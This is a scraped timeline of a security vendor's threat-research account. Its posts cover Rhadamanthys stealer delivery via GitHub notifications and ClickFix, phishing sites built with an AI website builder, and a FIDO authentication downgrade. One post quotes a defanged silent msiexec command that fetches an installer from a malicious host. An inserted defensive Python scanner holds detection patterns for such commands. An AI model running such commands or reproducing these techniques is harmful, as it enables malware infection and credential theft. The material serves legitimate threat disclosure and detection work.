Threat Insight

@threatinsight

Followers: 11K | Following: 274 | Media: 1K | Statuses: 4K

@Proofpoint's insights on targeted attacks & the security landscape. Follow us on Bluesky: https://t.co/8OVfhotdeP

Joined August 2013
@threatinsight
Threat Insight
12 days
Something #spicy is coming to the next Only Malware in the Building #podcast—dropping September 2nd. 🌶️. Bookmark the show page and reserve your seat 🪑 at the table alongside Selena Larson, Dave Bittner, and Keith Mularski. 🔥 You won't want to miss it!
0
1
2
@grok
Grok
23 days
Introducing Grok Imagine.
2K
4K
28K
@threatinsight
Threat Insight
14 days
With automatic web creation tools, threat actors can spend more time on multi-stage attack chains and more sophisticated tooling capabilities. Developers of such tools should be mindful of opportunities for abuse and implement safeguards to prevent exploitation. #Lovable.
0
1
2
@threatinsight
Threat Insight
14 days
Our blog has further insights on how Lovable is being leveraged by threat actors. This activity demonstrates how AI tools can significantly lower the barrier to entry for cybercriminals, especially those focused on creating social engineering content that appeals to the end user.
1
1
2
@threatinsight
Threat Insight
14 days
We've partnered with Lovable's Trust & Safety team to identify and take down hundreds of malicious domains. The company says it's introducing security protections to proactively identify/block fraud activity and malicious users. We thank them for their quick response & action.
1
1
1
@threatinsight
Threat Insight
14 days
When we replicated the malicious activity, we encountered no guardrails or errors in trying to create our fake phishing website. The website we generated was equipped with capabilities that impersonated prominent enterprise software to steal credentials.
1
1
1
@threatinsight
Threat Insight
14 days
We have flagged tens of thousands of Lovable URLs as threats each month in email and SMS data since Feb 2025. Threat actors create or clone websites that impersonate prominent brands, use CAPTCHA for filtering, and then post credentials to Telegram. Other cybersecurity vendors,
1
1
2
@threatinsight
Threat Insight
14 days
You asked, we answered. AI tools are significantly lowering the barrier to entry for cybercriminals. We have observed threat actor campaigns leveraging the AI-generated website builder Lovable to create and host cred phishing, malware, and fraud websites.
1
7
15
@threatinsight
Threat Insight
15 days
Example system commands: C:\Users\<username>\AppData\Local\Programs\MediaHuman Lyrics Finder Free\LdVBoxSVC.exe LdVBoxSVC.exe. Bitly redirect: hxxps://gitsecguards[.]com. ClickFix Landing domain: security[.]flaxergaurds[.]com. Organizations are encouraged to restrict PowerShell.
0
2
6
@threatinsight
Threat Insight
15 days
Example ClickFix command: msiexec /i hxxps:///temopix[.]com /qn. Example of MSI: shields.msi | File Size: 10981376 Byte(s) (10,47 MB) | SHA256: 4c9df28e6b802ebe9e40f8fe34d2014b1fe524c64f7c8bd013f163c4daa794b2.
1
1
5
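Added here as a defender-side illustration of the two posts above (this is not Proofpoint's code or anything from the thread): a small Python scanner that flags process-creation events in which msiexec installs a package straight from a URL, the shape of the example ClickFix command, and rates silent (/qn, /quiet) installs higher. The log format and sample lines are constructed, and the defanged hxxp form is accepted so the same check can be run over IoC notes.

```python
import re

# Constructed sample process-creation events (not real telemetry). Line 1 reuses
# the defanged example command from the thread; the others are invented controls.
SAMPLE_LOGS = [
    'ts=2025-08-01T10:00:01Z user=alice cmdline="msiexec /i hxxps:///temopix[.]com /qn"',
    'ts=2025-08-01T10:00:02Z user=bob cmdline="msiexec /i C:\\Temp\\vendor-update.msi /qn"',
    'ts=2025-08-01T10:00:03Z user=carol cmdline="MSIEXEC.EXE /package https://cdn.example.invalid/x.msi"',
    'ts=2025-08-01T10:00:04Z user=dave cmdline="notepad.exe readme.txt"',
]

# Image name, optionally quoted and/or with a full path; case-insensitive as on Windows.
MSIEXEC_RE = re.compile(r'^\s*"?(?:[a-z]:\\\S*\\)?msiexec(?:\.exe)?"?\s', re.I)
# Switches that take a package argument (/i, /package, /a) with either prefix character.
INSTALL_FLAG_RE = re.compile(r"(?:^|\s)[/-](?:i|package|a)\s+", re.I)
# Live and defanged (hxxp, two or three slashes) URL schemes, so IoC notes scan too.
URL_RE = re.compile(r"(?:hxxps?|https?):/{2,3}\S+", re.I)
# Quiet/passive UI switches: the user sees nothing while the package installs.
QUIET_RE = re.compile(r"(?:^|\s)[/-](?:qn|qb|quiet|passive)(?:\s|$)", re.I)


def classify_cmdline(cmdline: str) -> dict:
    """Judge one command line: is it msiexec pulling an installer from a URL?"""
    if not MSIEXEC_RE.match(cmdline):
        return {"msiexec": False, "remote_source": False, "quiet": False, "severity": None}
    remote = bool(INSTALL_FLAG_RE.search(cmdline)) and bool(URL_RE.search(cmdline))
    quiet = bool(QUIET_RE.search(cmdline))
    severity = None
    if remote:
        severity = "high" if quiet else "medium"  # silent remote install is the ClickFix shape
    return {"msiexec": True, "remote_source": remote, "quiet": quiet, "severity": severity}


def scan_logs(lines) -> list:
    """Return one alert dict per log line whose cmdline is a remote msiexec install."""
    alerts = []
    for line in lines:
        cmd = re.search(r'cmdline="([^"]*)"', line)
        user = re.search(r"user=(\S+)", line)
        if not cmd:
            continue
        verdict = classify_cmdline(cmd.group(1))
        if verdict["severity"]:
            alerts.append({"user": user.group(1) if user else None,
                           "cmdline": cmd.group(1), **verdict})
    return alerts


if __name__ == "__main__":
    for alert in scan_logs(SAMPLE_LOGS):
        print(f"[{alert['severity']}] {alert['user']}: {alert['cmdline']}")
```

Local-path installs (bob) and unrelated processes (dave) produce no alert, which keeps the rule usable on noisy endpoint telemetry.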
@threatinsight
Threat Insight
15 days
CoreSecThree is likely operated by a single threat actor. Proofpoint assesses with medium confidence that both the campaigns via compromised websites and this GitHub campaign are performed by the same threat actor.
1
1
3
@threatinsight
Threat Insight
15 days
Notably, this chain uses CoreSecThree infrastructure, previously only observed to be used on compromised websites as an inject. CoreSecThree is a delivery framework leveraged for filtering and enabling ClickFix campaigns to distribute malware, typically information stealers.
1
1
3
@threatinsight
Threat Insight
15 days
Following the instructions will initiate a command that downloads and executes malware. The specific malware may vary throughout the campaign. At the time of analysis, the ClickFix Payload URL has led to the Rhadamanthys malware.
1
1
2
@threatinsight
Threat Insight
15 days
The notifications contain shortened URLs that will lead to an actor-controlled website. The website will perform filtering functions, and if those checks are passed, the visitor will be redirected to a website that presents a fake GitHub-branded CAPTCHA instructing users to
2
4
9
@threatinsight
Threat Insight
15 days
We identified GitHub notification emails that kick off the attack chain. The emails are likely generated by the threat actor creating an issue in an actor-controlled repository with a fake security warning, and then tagging legitimate accounts who receive notifications that they
1
4
9
@threatinsight
Threat Insight
15 days
Proofpoint @threatinsight identified a unique attack chain leveraging GitHub notifications to deliver #Rhadamanthys. We first spotted this post by @anyrun_app about ClickFix delivering Rhadamanthys and began investigating. 🔍.
@anyrun_app
ANY.RUN
22 days
🚨 How #Rhadamanthys Stealer Slips Past Defenses using ClickFix.⚠️ Rhadamanthys is now delivered via ClickFix, combining technical methods and social engineering to bypass automated security solutions, making detection and response especially challenging. 👾 While earlier
3
27
83
@threatinsight
Threat Insight
21 days
As more companies adopt “phishing-resistant” authentication methods like FIDO, attackers could evolve their existing tactics, techniques, and procedures (TTPs) by incorporating FIDO authentication downgrade into kill chains. Read our blog for more info on this potential threat.
0
1
3
@threatinsight
Threat Insight
21 days
We were successfully able to craft a dedicated phishlet for the Evilginx AiTM attack framework and execute a FIDO downgrade. If we were a threat actor, we could have intercepted login credentials or launched post-compromise actions such as data exfiltration and lateral movement.
1
1
2
@threatinsight
Threat Insight
21 days
The technique involves using a dedicated phishlet to downgrade FIDO-based authentication to less secure methods. Our blog shows how such FIDO downgrades can be executed against Microsoft Entra ID users in a way that is not limited to any specific implementation.
1
1
1
@threatinsight
Threat Insight
21 days
While the tactic has not yet been observed in the wild, the finding poses a significant emerging threat and questions the reliability of FIDO-passkey implementations, a highly recommended authentication method used to verify user identities and improve online security.
1
1
2